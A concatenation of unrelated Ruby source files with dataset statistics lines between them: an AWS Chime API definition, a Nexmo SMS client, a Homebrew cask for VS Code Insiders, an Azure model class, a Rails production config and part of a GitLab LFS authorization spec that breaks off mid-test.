api.add_operation(:create_attendee, Seahorse::Model::Operation.new.tap do |o|
o.name = "CreateAttendee"
o.http_method = "POST"
o.http_request_uri = "/meetings/{MeetingId}/attendees"
o.input = Shapes::ShapeRef.new(shape: CreateAttendeeRequest)
o.output = Shapes::ShapeRef.new(shape: CreateAttendeeResponse)
o.errors << Shapes::ShapeRef.new(shape: BadRequestException)
o.errors << Shapes::ShapeRef.new(shape: ForbiddenException)
o.errors << Shapes::ShapeRef.new(shape: UnauthorizedException)
o.errors << Shapes::ShapeRef.new(shape: UnprocessableEntityException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
o.errors << Shapes::ShapeRef.new(shape: NotFoundException)
o.errors << Shapes::ShapeRef.new(shape: LimitExceededException)
end)
api.add_operation(:create_meeting, Seahorse::Model::Operation.new.tap do |o|
o.name = "CreateMeeting"
o.http_method = "POST"
o.http_request_uri = "/meetings"
o.input = Shapes::ShapeRef.new(shape: CreateMeetingRequest)
o.output = Shapes::ShapeRef.new(shape: CreateMeetingResponse)
o.errors << Shapes::ShapeRef.new(shape: BadRequestException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
o.errors << Shapes::ShapeRef.new(shape: UnauthorizedException)
o.errors << Shapes::ShapeRef.new(shape: LimitExceededException)
end)
api.add_operation(:create_meeting_with_attendees, Seahorse::Model::Operation.new.tap do |o|
o.name = "CreateMeetingWithAttendees"
o.http_method = "POST"
o.http_request_uri = "/meetings?operation=create-attendees"
o.input = Shapes::ShapeRef.new(shape: CreateMeetingWithAttendeesRequest)
o.output = Shapes::ShapeRef.new(shape: CreateMeetingWithAttendeesResponse)
o.errors << Shapes::ShapeRef.new(shape: BadRequestException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
o.errors << Shapes::ShapeRef.new(shape: UnauthorizedException)
o.errors << Shapes::ShapeRef.new(shape: LimitExceededException)
end)
api.add_operation(:delete_attendee, Seahorse::Model::Operation.new.tap do |o|
o.name = "DeleteAttendee"
o.http_method = "DELETE"
o.http_request_uri = "/meetings/{MeetingId}/attendees/{AttendeeId}"
o.input = Shapes::ShapeRef.new(shape: DeleteAttendeeRequest)
o.output = Shapes::ShapeRef.new(shape: Shapes::StructureShape.new(struct_class: Aws::EmptyStructure))
o.errors << Shapes::ShapeRef.new(shape: ForbiddenException)
o.errors << Shapes::ShapeRef.new(shape: NotFoundException)
end)
api.add_operation(:delete_meeting, Seahorse::Model::Operation.new.tap do |o|
o.name = "DeleteMeeting"
o.http_method = "DELETE"
o.http_request_uri = "/meetings/{MeetingId}"
o.input = Shapes::ShapeRef.new(shape: DeleteMeetingRequest)
o.output = Shapes::ShapeRef.new(shape: Shapes::StructureShape.new(struct_class: Aws::EmptyStructure))
o.errors << Shapes::ShapeRef.new(shape: BadRequestException)
o.errors << Shapes::ShapeRef.new(shape: ForbiddenException)
end)
api.add_operation(:get_attendee, Seahorse::Model::Operation.new.tap do |o|
o.name = "GetAttendee"
o.http_method = "GET"
o.http_request_uri = "/meetings/{MeetingId}/attendees/{AttendeeId}"
o.input = Shapes::ShapeRef.new(shape: GetAttendeeRequest)
o.output = Shapes::ShapeRef.new(shape: GetAttendeeResponse)
o.errors << Shapes::ShapeRef.new(shape: BadRequestException)
o.errors << Shapes::ShapeRef.new(shape: NotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ForbiddenException)
end)
api.add_operation(:get_meeting, Seahorse::Model::Operation.new.tap do |o|
o.name = "GetMeeting"
o.http_method = "GET"
o.http_request_uri = "/meetings/{MeetingId}"
o.input = Shapes::ShapeRef.new(shape: GetMeetingRequest)
o.output = Shapes::ShapeRef.new(shape: GetMeetingResponse)
o.errors << Shapes::ShapeRef.new(shape: NotFoundException)
o.errors << Shapes::ShapeRef.new(shape: BadRequestException)
o.errors << Shapes::ShapeRef.new(shape: ForbiddenException)
end)
api.add_operation(:list_attendees, Seahorse::Model::Operation.new.tap do |o|
o.name = "ListAttendees"
o.http_method = "GET"
o.http_request_uri = "/meetings/{MeetingId}/attendees"
o.input = Shapes::ShapeRef.new(shape: ListAttendeesRequest)
o.output = Shapes::ShapeRef.new(shape: ListAttendeesResponse)
o.errors << Shapes::ShapeRef.new(shape: BadRequestException)
o.errors << Shapes::ShapeRef.new(shape: NotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ForbiddenException)
o[:pager] = Aws::Pager.new(
limit_key: "max_results",
tokens: {
"next_token" => "next_token"
}
)
end)
api.add_operation(:start_meeting_transcription, Seahorse::Model::Operation.new.tap do |o|
o.name = "StartMeetingTranscription"
o.http_method = "POST"
o.http_request_uri = "/meetings/{MeetingId}/transcription?operation=start"
o.input = Shapes::ShapeRef.new(shape: StartMeetingTranscriptionRequest)
o.output = Shapes::ShapeRef.new(shape: Shapes::StructureShape.new(struct_class: Aws::EmptyStructure))
o.errors << Shapes::ShapeRef.new(shape: NotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ForbiddenException)
o.errors << Shapes::ShapeRef.new(shape: BadRequestException)
o.errors << Shapes::ShapeRef.new(shape: UnauthorizedException)
o.errors << Shapes::ShapeRef.new(shape: LimitExceededException)
o.errors << Shapes::ShapeRef.new(shape: UnprocessableEntityException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
end)
api.add_operation(:stop_meeting_transcription, Seahorse::Model::Operation.new.tap do |o|
o.name = "StopMeetingTranscription"
o.http_method = "POST"
o.http_request_uri = "/meetings/{MeetingId}/transcription?operation=stop"
o.input = Shapes::ShapeRef.new(shape: StopMeetingTranscriptionRequest)
o.output = Shapes::ShapeRef.new(shape: Shapes::StructureShape.new(struct_class: Aws::EmptyStructure))
o.errors << Shapes::ShapeRef.new(shape: ForbiddenException)
o.errors << Shapes::ShapeRef.new(shape: NotFoundException)
o.errors << Shapes::ShapeRef.new(shape: BadRequestException)
o.errors << Shapes::ShapeRef.new(shape: UnauthorizedException)
o.errors << Shapes::ShapeRef.new(shape: UnprocessableEntityException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
end)
end
end
end
| 73.990698 | 211 | 0.775302 |
b93aad7764fc78a8da8d7450c68772588353fde5 | 3,543 | # encoding: UTF-8
# Copyright © 2012, 2013, 2014, 2015, Carousel Apps
require "bigdecimal"
require "net/http"
require "net/https"
require "json"
require "uri"
# Nexmo response
class ActionTexter::NexmoResponse < ActionTexter::Response
SUCCESS_RESPONSE_CODE = "0"
# TODO: Some of these should be moved to Response if they are common enough.
attr_reader :original, :parts_count, :parts, :cost, :remaining_balance, :reference
private
def process_response(raw)
@success = true
@original = JSON.parse(raw)
@parts_count = @original["message-count"].to_i
@cost = BigDecimal.new("0")
@reference = @original["messages"].first["client-ref"] # They should all be the same, we only record it the first time.
@remaining_balance = @original["messages"].last["remaining-balance"] # I hope the last one is the lowest one, the cost of a single message shouldn't make that big of a difference anyway.
@parts = []
error_messages = []
@original["messages"].each do |raw_part|
if @success # Update the contents of success to status of this part unless @succes is already failed.
@success = raw_part["status"] == SUCCESS_RESPONSE_CODE
end
part = {:id => raw_part["message-id"],
:to => raw_part["to"],
:success => raw_part["status"] == SUCCESS_RESPONSE_CODE}
part[:reference] = raw_part["client-ref"] if raw_part.has_key? "client-ref"
if raw_part.has_key? "message-price"
part[:cost] = raw_part["message-price"]
@cost += BigDecimal.new(raw_part["message-price"])
end
if raw_part.has_key? "remaining-balance"
part[:remaining_balance] = BigDecimal.new(raw_part["remaining-balance"])
end
if raw_part.has_key? "error-text"
part[:error_message] = raw_part["error-text"]
error_messages << part[:error_message]
end
@parts << part
end
if error_messages.any?
@error_message = error_messages.uniq.join(", ")
end
end
end
# Implementation of client for Nexmo: http://nexmo.com
class ActionTexter::NexmoClient < ActionTexter::Client
attr_accessor :key, :secret
# Create a new Nexmo client with key and secret.
#
# @param [String] key key as specified by Nexmo for authenticating.
# @param [String] secret secret as specified by Nexmo for authenticating.
def initialize(key, secret)
super()
self.key = key
self.secret = secret
end
def deliver(message)
client = Net::HTTP.new("rest.nexmo.com", 443)
client.use_ssl = true
# Nexmo doesn't like phone numbers starting with a +
# Pattern only matches phones that are pristine phone numbers starting with a +, and leaves everything else alone
pattern = /^\+(\d+)$/
from = (message.from =~ pattern ? message.from.gsub(pattern, '\1') : message.from )
to = (message.to =~ pattern ? message.to.gsub(pattern, '\1') : message.to )
response = client.post(
"/sms/json",
URI.encode_www_form("username" => @key,
"password" => @secret,
"from" => from,
"to" => to,
"text" => message.text,
"type" => (message.text.ascii_only? ? "text" : "unicode"),
"client-ref" => message.reference),
{"Content-Type" => "application/x-www-form-urlencoded"})
return ActionTexter::NexmoResponse.new(response.body)
end
# @private
def to_s
"#<#{self.class.name}:#{key}>"
end
end
| 36.153061 | 190 | 0.631668 |
f7e6c4f95e7e33b8da993bf5905d42e4f79103f2 | 1,555 | cask "visual-studio-code-insiders" do
version "1.58.0,a81fff00c9dab105800118fcf8b044cd84620419"
if Hardware::CPU.intel?
sha256 "5f68ea465959f9c157e11493c5812c4b566424819313e841381360a0a53b30f9"
url "https://az764295.vo.msecnd.net/insider/#{version.after_comma}/VSCode-darwin.zip",
verified: "az764295.vo.msecnd.net/insider/"
else
sha256 "3d00cfa729ee6366f28cd8cf5e698147c8d80509128d60da854388ad02ff87a1"
url "https://az764295.vo.msecnd.net/insider/#{version.after_comma}/VSCode-darwin-arm64.zip",
verified: "az764295.vo.msecnd.net/insider/"
end
name "Microsoft Visual Studio Code"
name "Visual Studio Code Insiders"
desc "Code editor"
homepage "https://code.visualstudio.com/insiders"
livecheck do
url "https://update.code.visualstudio.com/api/update/darwin-universal/insider/VERSION"
strategy :page_match do |page|
name = page[/"name":"(\d+(?:\.\d+)*)/i, 1]
version = page[/"version":"(\w+)/i, 1]
"#{name},#{version}"
end
end
auto_updates true
app "Visual Studio Code - Insiders.app"
binary "#{appdir}/Visual Studio Code - Insiders.app/Contents/Resources/app/bin/code", target: "code-insiders"
zap trash: [
"~/Library/Application Support/Code - Insiders",
"~/Library/Caches/Code - Insiders",
"~/Library/Caches/com.microsoft.VSCodeInsiders",
"~/Library/Caches/com.microsoft.VSCodeInsiders.ShipIt",
"~/Library/Preferences/com.microsoft.VSCodeInsiders.helper.plist",
"~/Library/Preferences/com.microsoft.VSCodeInsiders.plist",
]
end
| 35.340909 | 111 | 0.717042 |
61629e5680b168b7af6aed547443c588fe2f1e73 | 1,648 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Compute::Mgmt::V2019_12_01
module Models
#
# The properties describe the recommended machine configuration for this
# Image Definition. These properties are updatable.
#
class RecommendedMachineConfiguration
include MsRestAzure
# @return [ResourceRange]
attr_accessor :v_cpus
# @return [ResourceRange]
attr_accessor :memory
#
# Mapper for RecommendedMachineConfiguration class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'RecommendedMachineConfiguration',
type: {
name: 'Composite',
class_name: 'RecommendedMachineConfiguration',
model_properties: {
v_cpus: {
client_side_validation: true,
required: false,
serialized_name: 'vCPUs',
type: {
name: 'Composite',
class_name: 'ResourceRange'
}
},
memory: {
client_side_validation: true,
required: false,
serialized_name: 'memory',
type: {
name: 'Composite',
class_name: 'ResourceRange'
}
}
}
}
}
end
end
end
end
| 27.016393 | 76 | 0.54551 |
33b0e7f0dabdcd298ee8926b1a344940b3953ec5 | 256 | module Kata
module Kyu7
class << self
def growth_of_a_population(p0, percent, aug, p)
loop.with_index(1) do |_, years|
return years unless (p0 += (p0 * percent/100.0 + aug).floor) < p
end
end
end
end
end
| 18.285714 | 74 | 0.570313 |
e950dbc6233b0de93f3fd8f71607f3cdf06d22de | 5,452 | # frozen_string_literal: true
require 'active_support/core_ext/integer/time'
Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Ensures that a master key has been made available in either ENV["RAILS_MASTER_KEY"]
# or in config/master.key. This key is used to decrypt credentials (and other encrypted files).
# config.require_master_key = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Compress CSS using a preprocessor.
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Store uploaded files on the local file system (see config/storage.yml for options).
config.active_storage.service = :local
# Mount Action Cable outside main process or domain.
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Include generic and useful information about system operation, but avoid logging too much
# information to avoid inadvertent exposure of personally identifiable information (PII).
config.log_level = :info
# Prepend all log lines with the following tags.
config.log_tags = [:request_id]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment).
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "Private_events_production"
config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Log disallowed deprecations.
config.active_support.disallowed_deprecation = :log
# Tell Active Support which deprecation messages to disallow.
config.active_support.disallowed_deprecation_warnings = []
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require "syslog/logger"
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV['RAILS_LOG_TO_STDOUT'].present?
logger = ActiveSupport::Logger.new($stdout)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
# Inserts middleware to perform automatic connection switching.
# The `database_selector` hash is used to pass options to the DatabaseSelector
# middleware. The `delay` is used to determine how long to wait after a write
# to send a subsequent read to the primary.
#
# The `database_resolver` class is used by the middleware to determine which
# database is appropriate to use based on the time delay.
#
# The `database_resolver_context` class is used by the middleware to set
# timestamps for the last write to the primary. The resolver uses the context
# class timestamps to determine how long to wait before reading from the
# replica.
#
# By default Rails will store a last write timestamp in the session. The
# DatabaseSelector middleware is designed as such you can define your own
# strategy for connection switching and pass that into the middleware through
# these configuration options.
# config.active_record.database_selector = { delay: 2.seconds }
# config.active_record.database_resolver = ActiveRecord::Middleware::DatabaseSelector::Resolver
# config.active_record.database_resolver_context = ActiveRecord::Middleware::DatabaseSelector::Resolver::Session
# config.action_mailer.default_url_options = { host: 'localhost', port: 3000 }
end
| 43.967742 | 114 | 0.765407 |
f80abb06fca31b828fc80dafd03d1f7477fc413d | 45,827 | require 'spec_helper'
describe 'Git LFS API and storage' do
include WorkhorseHelpers
include ProjectForksHelper
let(:user) { create(:user) }
let!(:lfs_object) { create(:lfs_object, :with_file) }
let(:headers) do
{
'Authorization' => authorization,
'X-Sendfile-Type' => sendfile
}.compact
end
let(:authorization) { }
let(:sendfile) { }
let(:pipeline) { create(:ci_empty_pipeline, project: project) }
let(:sample_oid) { lfs_object.oid }
let(:sample_size) { lfs_object.size }
describe 'when lfs is disabled' do
let(:project) { create(:project) }
let(:body) do
{
'objects' => [
{ 'oid' => '91eff75a492a3ed0dfcb544d7f31326bc4014c8551849c192fd1e48d4dd2c897',
'size' => 1575078 },
{ 'oid' => sample_oid,
'size' => sample_size }
],
'operation' => 'upload'
}
end
let(:authorization) { authorize_user }
before do
allow(Gitlab.config.lfs).to receive(:enabled).and_return(false)
post_lfs_json "#{project.http_url_to_repo}/info/lfs/objects/batch", body, headers
end
it 'responds with 501' do
expect(response).to have_gitlab_http_status(501)
expect(json_response).to include('message' => 'Git LFS is not enabled on this GitLab server, contact your admin.')
end
end
context 'project specific LFS settings' do
let(:project) { create(:project) }
let(:body) do
{
'objects' => [
{ 'oid' => '91eff75a492a3ed0dfcb544d7f31326bc4014c8551849c192fd1e48d4dd2c897',
'size' => 1575078 },
{ 'oid' => sample_oid,
'size' => sample_size }
],
'operation' => 'upload'
}
end
let(:authorization) { authorize_user }
context 'with LFS disabled globally' do
before do
project.add_master(user)
allow(Gitlab.config.lfs).to receive(:enabled).and_return(false)
end
describe 'LFS disabled in project' do
before do
project.update_attribute(:lfs_enabled, false)
end
it 'responds with a 501 message on upload' do
post_lfs_json "#{project.http_url_to_repo}/info/lfs/objects/batch", body, headers
expect(response).to have_gitlab_http_status(501)
end
it 'responds with a 501 message on download' do
get "#{project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}", nil, headers
expect(response).to have_gitlab_http_status(501)
end
end
describe 'LFS enabled in project' do
before do
project.update_attribute(:lfs_enabled, true)
end
it 'responds with a 501 message on upload' do
post_lfs_json "#{project.http_url_to_repo}/info/lfs/objects/batch", body, headers
expect(response).to have_gitlab_http_status(501)
end
it 'responds with a 501 message on download' do
get "#{project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}", nil, headers
expect(response).to have_gitlab_http_status(501)
end
end
end
context 'with LFS enabled globally' do
before do
project.add_master(user)
enable_lfs
end
describe 'LFS disabled in project' do
before do
project.update_attribute(:lfs_enabled, false)
end
it 'responds with a 403 message on upload' do
post_lfs_json "#{project.http_url_to_repo}/info/lfs/objects/batch", body, headers
expect(response).to have_gitlab_http_status(403)
expect(json_response).to include('message' => 'Access forbidden. Check your access level.')
end
it 'responds with a 403 message on download' do
get "#{project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}", nil, headers
expect(response).to have_gitlab_http_status(403)
expect(json_response).to include('message' => 'Access forbidden. Check your access level.')
end
end
describe 'LFS enabled in project' do
before do
project.update_attribute(:lfs_enabled, true)
end
it 'responds with a 200 message on upload' do
post_lfs_json "#{project.http_url_to_repo}/info/lfs/objects/batch", body, headers
expect(response).to have_gitlab_http_status(200)
expect(json_response['objects'].first['size']).to eq(1575078)
end
it 'responds with a 200 message on download' do
get "#{project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}", nil, headers
expect(response).to have_gitlab_http_status(200)
end
end
end
end
describe 'deprecated API' do
let(:project) { create(:project) }
before do
enable_lfs
end
shared_examples 'a deprecated' do
it 'responds with 501' do
expect(response).to have_gitlab_http_status(501)
end
it 'returns deprecated message' do
expect(json_response).to include('message' => 'Server supports batch API only, please update your Git LFS client to version 1.0.1 and up.')
end
end
context 'when fetching lfs object using deprecated API' do
let(:authorization) { authorize_user }
before do
get "#{project.http_url_to_repo}/info/lfs/objects/#{sample_oid}", nil, headers
end
it_behaves_like 'a deprecated'
end
context 'when handling lfs request using deprecated API' do
let(:authorization) { authorize_user }
before do
post_lfs_json "#{project.http_url_to_repo}/info/lfs/objects", nil, headers
end
it_behaves_like 'a deprecated'
end
end
describe 'when fetching lfs object' do
let(:project) { create(:project) }
let(:update_permissions) { }
let(:before_get) { }
before do
enable_lfs
update_permissions
before_get
get "#{project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}", nil, headers
end
context 'and request comes from gitlab-workhorse' do
context 'without user being authorized' do
it 'responds with status 401' do
expect(response).to have_gitlab_http_status(401)
end
end
context 'with required headers' do
shared_examples 'responds with a file' do
let(:sendfile) { 'X-Sendfile' }
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
it 'responds with the file location' do
expect(response.headers['Content-Type']).to eq('application/octet-stream')
expect(response.headers['X-Sendfile']).to eq(lfs_object.file.path)
end
end
context 'with user is authorized' do
let(:authorization) { authorize_user }
context 'and does not have project access' do
let(:update_permissions) do
project.lfs_objects << lfs_object
end
it 'responds with status 404' do
expect(response).to have_gitlab_http_status(404)
end
end
context 'and does have project access' do
let(:update_permissions) do
project.add_master(user)
project.lfs_objects << lfs_object
end
it_behaves_like 'responds with a file'
context 'when LFS uses object storage' do
context 'when proxy download is enabled' do
let(:before_get) do
stub_lfs_object_storage(proxy_download: true)
lfs_object.file.migrate!(LfsObjectUploader::Store::REMOTE)
end
it 'responds with redirect' do
expect(response).to have_gitlab_http_status(200)
end
it 'responds with the workhorse send-url' do
expect(response.headers[Gitlab::Workhorse::SEND_DATA_HEADER]).to start_with("send-url:")
end
end
context 'when proxy download is disabled' do
let(:before_get) do
stub_lfs_object_storage(proxy_download: false)
lfs_object.file.migrate!(LfsObjectUploader::Store::REMOTE)
end
it 'responds with redirect' do
expect(response).to have_gitlab_http_status(302)
end
it 'responds with the file location' do
expect(response.location).to include(lfs_object.reload.file.path)
end
end
end
end
end
context 'when deploy key is authorized' do
let(:key) { create(:deploy_key) }
let(:authorization) { authorize_deploy_key }
let(:update_permissions) do
project.deploy_keys << key
project.lfs_objects << lfs_object
end
it_behaves_like 'responds with a file'
end
describe 'when using a user key' do
let(:authorization) { authorize_user_key }
context 'when user allowed' do
let(:update_permissions) do
project.add_master(user)
project.lfs_objects << lfs_object
end
it_behaves_like 'responds with a file'
end
context 'when user not allowed' do
let(:update_permissions) do
project.lfs_objects << lfs_object
end
it 'responds with status 404' do
expect(response).to have_gitlab_http_status(404)
end
end
end
context 'when build is authorized as' do
let(:authorization) { authorize_ci_project }
shared_examples 'can download LFS only from own projects' do
context 'for owned project' do
let(:project) { create(:project, namespace: user.namespace) }
let(:update_permissions) do
project.lfs_objects << lfs_object
end
it_behaves_like 'responds with a file'
end
context 'for member of project' do
let(:pipeline) { create(:ci_empty_pipeline, project: project) }
let(:update_permissions) do
project.add_reporter(user)
project.lfs_objects << lfs_object
end
it_behaves_like 'responds with a file'
end
context 'for other project' do
let(:other_project) { create(:project) }
let(:pipeline) { create(:ci_empty_pipeline, project: other_project) }
let(:update_permissions) do
project.lfs_objects << lfs_object
end
it 'rejects downloading code' do
expect(response).to have_gitlab_http_status(other_project_status)
end
end
end
context 'administrator' do
let(:user) { create(:admin) }
let(:build) { create(:ci_build, :running, pipeline: pipeline, user: user) }
it_behaves_like 'can download LFS only from own projects' do
# We render 403, because administrator does have normally access
let(:other_project_status) { 403 }
end
end
context 'regular user' do
let(:user) { create(:user) }
let(:build) { create(:ci_build, :running, pipeline: pipeline, user: user) }
it_behaves_like 'can download LFS only from own projects' do
# We render 404, to prevent data leakage about existence of the project
let(:other_project_status) { 404 }
end
end
context 'does not have user' do
let(:build) { create(:ci_build, :running, pipeline: pipeline) }
it_behaves_like 'can download LFS only from own projects' do
# We render 404, to prevent data leakage about existence of the project
let(:other_project_status) { 404 }
end
end
end
end
context 'without required headers' do
let(:authorization) { authorize_user }
it 'responds with status 404' do
expect(response).to have_gitlab_http_status(404)
end
end
end
end
describe 'when handling lfs batch request' do
let(:update_lfs_permissions) { }
let(:update_user_permissions) { }
before do
enable_lfs
update_lfs_permissions
update_user_permissions
post_lfs_json "#{project.http_url_to_repo}/info/lfs/objects/batch", body, headers
end
describe 'download' do
let(:project) { create(:project) }
let(:body) do
{
'operation' => 'download',
'objects' => [
{ 'oid' => sample_oid,
'size' => sample_size }
]
}
end
shared_examples 'an authorized requests' do
context 'when downloading an lfs object that is assigned to our project' do
let(:update_lfs_permissions) do
project.lfs_objects << lfs_object
end
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
it 'with href to download' do
expect(json_response).to eq({
'objects' => [
{
'oid' => sample_oid,
'size' => sample_size,
'actions' => {
'download' => {
'href' => "#{project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}",
'header' => { 'Authorization' => authorization }
}
}
}
]
})
end
end
context 'when downloading an lfs object that is assigned to other project' do
let(:other_project) { create(:project) }
let(:update_lfs_permissions) do
other_project.lfs_objects << lfs_object
end
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
it 'with href to download' do
expect(json_response).to eq({
'objects' => [
{
'oid' => sample_oid,
'size' => sample_size,
'error' => {
'code' => 404,
'message' => "Object does not exist on the server or you don't have permissions to access it"
}
}
]
})
end
end
context 'when downloading a lfs object that does not exist' do
let(:body) do
{
'operation' => 'download',
'objects' => [
{ 'oid' => '91eff75a492a3ed0dfcb544d7f31326bc4014c8551849c192fd1e48d4dd2c897',
'size' => 1575078 }
]
}
end
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
it 'with an 404 for specific object' do
expect(json_response).to eq({
'objects' => [
{
'oid' => '91eff75a492a3ed0dfcb544d7f31326bc4014c8551849c192fd1e48d4dd2c897',
'size' => 1575078,
'error' => {
'code' => 404,
'message' => "Object does not exist on the server or you don't have permissions to access it"
}
}
]
})
end
end
context 'when downloading one new and one existing lfs object' do
let(:body) do
{
'operation' => 'download',
'objects' => [
{ 'oid' => '91eff75a492a3ed0dfcb544d7f31326bc4014c8551849c192fd1e48d4dd2c897',
'size' => 1575078 },
{ 'oid' => sample_oid,
'size' => sample_size }
]
}
end
let(:update_lfs_permissions) do
project.lfs_objects << lfs_object
end
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
it 'responds with upload hypermedia link for the new object' do
expect(json_response).to eq({
'objects' => [
{
'oid' => '91eff75a492a3ed0dfcb544d7f31326bc4014c8551849c192fd1e48d4dd2c897',
'size' => 1575078,
'error' => {
'code' => 404,
'message' => "Object does not exist on the server or you don't have permissions to access it"
}
},
{
'oid' => sample_oid,
'size' => sample_size,
'actions' => {
'download' => {
'href' => "#{project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}",
'header' => { 'Authorization' => authorization }
}
}
}
]
})
end
end
end
context 'when user is authenticated' do
let(:authorization) { authorize_user }
let(:update_user_permissions) do
project.add_role(user, role)
end
it_behaves_like 'an authorized requests' do
let(:role) { :reporter }
end
context 'when user does is not member of the project' do
let(:update_user_permissions) { nil }
it 'responds with 404' do
expect(response).to have_gitlab_http_status(404)
end
end
context 'when user does not have download access' do
let(:role) { :guest }
it 'responds with 403' do
expect(response).to have_gitlab_http_status(403)
end
end
end
context 'when build is authorized as' do
let(:authorization) { authorize_ci_project }
let(:update_lfs_permissions) do
project.lfs_objects << lfs_object
end
shared_examples 'can download LFS only from own projects' do
context 'for own project' do
let(:pipeline) { create(:ci_empty_pipeline, project: project) }
let(:update_user_permissions) do
project.add_reporter(user)
end
it_behaves_like 'an authorized requests'
end
context 'for other project' do
let(:other_project) { create(:project) }
let(:pipeline) { create(:ci_empty_pipeline, project: other_project) }
it 'rejects downloading code' do
expect(response).to have_gitlab_http_status(other_project_status)
end
end
end
context 'administrator' do
let(:user) { create(:admin) }
let(:build) { create(:ci_build, :running, pipeline: pipeline, user: user) }
it_behaves_like 'can download LFS only from own projects' do
# We render 403, because administrator does have normally access
let(:other_project_status) { 403 }
end
end
context 'regular user' do
let(:user) { create(:user) }
let(:build) { create(:ci_build, :running, pipeline: pipeline, user: user) }
it_behaves_like 'can download LFS only from own projects' do
# We render 404, to prevent data leakage about existence of the project
let(:other_project_status) { 404 }
end
end
context 'does not have user' do
let(:build) { create(:ci_build, :running, pipeline: pipeline) }
it_behaves_like 'can download LFS only from own projects' do
# We render 404, to prevent data leakage about existence of the project
let(:other_project_status) { 404 }
end
end
end
context 'when user is not authenticated' do
describe 'is accessing public project' do
let(:project) { create(:project, :public) }
let(:update_lfs_permissions) do
project.lfs_objects << lfs_object
end
it 'responds with status 200 and href to download' do
expect(response).to have_gitlab_http_status(200)
end
it 'responds with status 200 and href to download' do
expect(json_response).to eq({
'objects' => [
{
'oid' => sample_oid,
'size' => sample_size,
'authenticated' => true,
'actions' => {
'download' => {
'href' => "#{project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}",
'header' => {}
}
}
}
]
})
end
end
describe 'is accessing non-public project' do
let(:update_lfs_permissions) do
project.lfs_objects << lfs_object
end
it 'responds with authorization required' do
expect(response).to have_gitlab_http_status(401)
end
end
end
end
describe 'upload' do
let(:project) { create(:project, :public) }
let(:body) do
{
'operation' => 'upload',
'objects' => [
{ 'oid' => sample_oid,
'size' => sample_size }
]
}
end
shared_examples 'pushes new LFS objects' do
let(:sample_size) { 150.megabytes }
let(:sample_oid) { '91eff75a492a3ed0dfcb544d7f31326bc4014c8551849c192fd1e48d4dd2c897' }
it 'responds with upload hypermedia link' do
expect(response).to have_gitlab_http_status(200)
expect(json_response['objects']).to be_kind_of(Array)
expect(json_response['objects'].first['oid']).to eq(sample_oid)
expect(json_response['objects'].first['size']).to eq(sample_size)
expect(json_response['objects'].first['actions']['upload']['href']).to eq("#{Gitlab.config.gitlab.url}/#{project.full_path}.git/gitlab-lfs/objects/#{sample_oid}/#{sample_size}")
expect(json_response['objects'].first['actions']['upload']['header']).to eq('Authorization' => authorization)
end
end
describe 'when request is authenticated' do
describe 'when user has project push access' do
let(:authorization) { authorize_user }
let(:update_user_permissions) do
project.add_developer(user)
end
context 'when pushing an lfs object that already exists' do
let(:other_project) { create(:project) }
let(:update_lfs_permissions) do
other_project.lfs_objects << lfs_object
end
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
it 'responds with links the object to the project' do
expect(json_response['objects']).to be_kind_of(Array)
